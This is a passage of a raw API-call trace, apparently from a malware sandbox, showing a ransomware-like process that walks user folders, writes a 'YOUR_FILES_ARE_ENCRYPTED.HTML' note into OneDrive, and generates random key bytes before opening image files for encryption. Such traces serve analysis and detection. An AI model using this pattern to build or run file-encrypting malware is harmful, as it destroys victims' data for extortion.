returned=".DAT" [0168.128] lstrlenW (lpString=".DAT") returned 4 [0168.128] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0168.128] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd263de50, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd263de50, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xaf9f4460, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0168.128] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\ntuser.dat.LOG1") returned 39 [0168.128] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.128] PathFindExtensionW (pszPath="ntuser.dat.LOG1") returned=".LOG1" [0168.128] lstrlenW (lpString=".LOG1") returned 5 [0168.129] PathFindExtensionW (pszPath="ntuser.dat.LOG1") returned=".LOG1" [0168.129] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd263de50, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd263de50, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd263de50, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0168.129] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\ntuser.dat.LOG2") returned 39 [0168.129] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.129] PathFindExtensionW (pszPath="ntuser.dat.LOG2") returned=".LOG2" [0168.129] lstrlenW (lpString=".LOG2") returned 5 [0168.129] PathFindExtensionW (pszPath="ntuser.dat.LOG2") returned=".LOG2" [0168.129] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2663fb0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2663fb0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xe9f99690, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0168.129] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf") returned 79 [0168.129] lstrcmpW (lpString1="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.129] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf") returned=".blf" [0168.129] lstrlenW (lpString=".blf") returned 4 [0168.129] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf") returned=".blf" [0168.129] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd268a110, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd268a110, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xe9f99690, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0168.129] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms") returned 116 [0168.129] lstrcmpW (lpString1="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.129] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0168.129] lstrlenW (lpString=".regtrans-ms") returned 12 [0168.129] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0168.129] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd26b0270, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26b0270, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xe9f99690, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0168.129] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms") returned 116 [0168.129] lstrcmpW (lpString1="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.129] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0168.129] lstrlenW (lpString=".regtrans-ms") returned 12 [0168.129] PathFindExtensionW (pszPath="NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0168.129] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd236a430, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b50453a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0168.129] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\ntuser.ini") returned 34 [0168.129] lstrcmpW (lpString1="ntuser.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.129] PathFindExtensionW (pszPath="ntuser.ini") returned=".ini" [0168.129] lstrlenW (lpString=".ini") returned 4 [0168.130] PathFindExtensionW (pszPath="ntuser.ini") returned=".ini" [0168.130] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad545d50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad545d50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0168.130] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive") returned 32 [0168.130] GetProcessHeap () returned 0x270000 [0168.130] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.130] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive" [0168.130] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive\\*" [0168.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad545d50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad545d50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0168.130] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xad545d50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad545d50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.130] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xad545d50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad545d50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x65, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0168.130] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive\\desktop.ini") returned 44 [0168.130] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.130] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.130] lstrlenW (lpString=".ini") returned 4 [0168.130] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.130] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xad545d50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad545d50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x65, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0168.131] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0168.131] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0168.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\onedrive\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0168.131] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0168.133] CloseHandle (hObject=0x5a0) returned 1 [0168.133] GetProcessHeap () returned 0x270000 [0168.134] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.134] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaeae5b00, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaeae5b00, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Pictures", cAlternateFileName="")) returned 1 [0168.134] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures") returned 32 [0168.134] GetProcessHeap () returned 0x270000 [0168.134] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.135] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures" [0168.135] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\*" [0168.135] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaeae5b00, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaeae5b00, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0168.135] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaeae5b00, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaeae5b00, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.135] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4845ecd0, ftCreationTime.dwHighDateTime=0x1d7e4d8, ftLastAccessTime.dwLowDateTime=0xfca1610, ftLastAccessTime.dwHighDateTime=0x1d7e749, ftLastWriteTime.dwLowDateTime=0xfca1610, ftLastWriteTime.dwHighDateTime=0x1d7e749, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="-qapdyt.gif", cAlternateFileName="")) returned 1 [0168.135] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif") returned 44 [0168.135] lstrcmpW (lpString1="-qapdyt.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.135] PathFindExtensionW (pszPath="-qapdyt.gif") returned=".gif" [0168.135] lstrlenW (lpString=".gif") returned 4 [0168.135] PathFindExtensionW (pszPath="-qapdyt.gif") returned=".gif" [0168.135] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif" (normalized: "c:\\users\\5alr3u30d3\\pictures\\-qapdyt.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0168.136] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=19456) returned 1 [0168.136] GetProcessHeap () returned 0x270000 [0168.136] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0168.139] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="5F") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="C2") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="E5") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="95") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="C2") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="73") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="A6") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="9C") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="2B") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="C3") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="DE") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="01") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="0C") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="CA") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="66") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="5E") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="C1") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="7C") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="10") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="C2") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="2C") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="5E") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="70") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="A7") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="F5") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="B9") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="24") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="F4") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="03") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="59") returned 2 [0168.139] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="FE") returned 2 [0168.140] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="25") returned 2 [0168.140] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\-qapdyt.gif" [0168.140] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.140] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0168.140] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdee6c6e0, ftCreationTime.dwHighDateTime=0x1d7d86d, ftLastAccessTime.dwLowDateTime=0x98fb29c0, ftLastAccessTime.dwHighDateTime=0x1d7e761, ftLastWriteTime.dwLowDateTime=0x98fb29c0, ftLastWriteTime.dwHighDateTime=0x1d7e761, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="C1jO8j6", cAlternateFileName="")) returned 1 [0168.140] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6") returned 40 [0168.140] GetProcessHeap () returned 0x270000 [0168.140] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0168.140] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6" [0168.140] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\*" [0168.140] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdee6c6e0, ftCreationTime.dwHighDateTime=0x1d7d86d, ftLastAccessTime.dwLowDateTime=0x98fb29c0, ftLastAccessTime.dwHighDateTime=0x1d7e761, ftLastWriteTime.dwLowDateTime=0x98fb29c0, ftLastWriteTime.dwHighDateTime=0x1d7e761, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0168.141] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdee6c6e0, ftCreationTime.dwHighDateTime=0x1d7d86d, ftLastAccessTime.dwLowDateTime=0x98fb29c0, ftLastAccessTime.dwHighDateTime=0x1d7e761, ftLastWriteTime.dwLowDateTime=0x98fb29c0, ftLastWriteTime.dwHighDateTime=0x1d7e761, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.141] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe85f4260, ftCreationTime.dwHighDateTime=0x1d7da43, ftLastAccessTime.dwLowDateTime=0x9a1477d0, ftLastAccessTime.dwHighDateTime=0x1d7dbc2, ftLastWriteTime.dwLowDateTime=0x9a1477d0, ftLastWriteTime.dwHighDateTime=0x1d7dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb916d8, dwReserved1=0x0, cFileName="2 Kw", cAlternateFileName="2KW~1")) returned 1 [0168.141] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw") returned 45 [0168.141] GetProcessHeap () returned 0x270000 [0168.141] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76302f8 [0168.141] lstrcpyW (in: lpString1=0x76302f8, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw" [0168.141] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\*" [0168.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe85f4260, ftCreationTime.dwHighDateTime=0x1d7da43, ftLastAccessTime.dwLowDateTime=0x9a1477d0, ftLastAccessTime.dwHighDateTime=0x1d7dbc2, ftLastWriteTime.dwLowDateTime=0x9a1477d0, ftLastWriteTime.dwHighDateTime=0x1d7dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0168.142] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe85f4260, ftCreationTime.dwHighDateTime=0x1d7da43, ftLastAccessTime.dwLowDateTime=0x9a1477d0, ftLastAccessTime.dwHighDateTime=0x1d7dbc2, ftLastWriteTime.dwLowDateTime=0x9a1477d0, ftLastWriteTime.dwHighDateTime=0x1d7dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.142] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34730d70, ftCreationTime.dwHighDateTime=0x1d7e080, ftLastAccessTime.dwLowDateTime=0xc3d59670, ftLastAccessTime.dwHighDateTime=0x1d7e096, 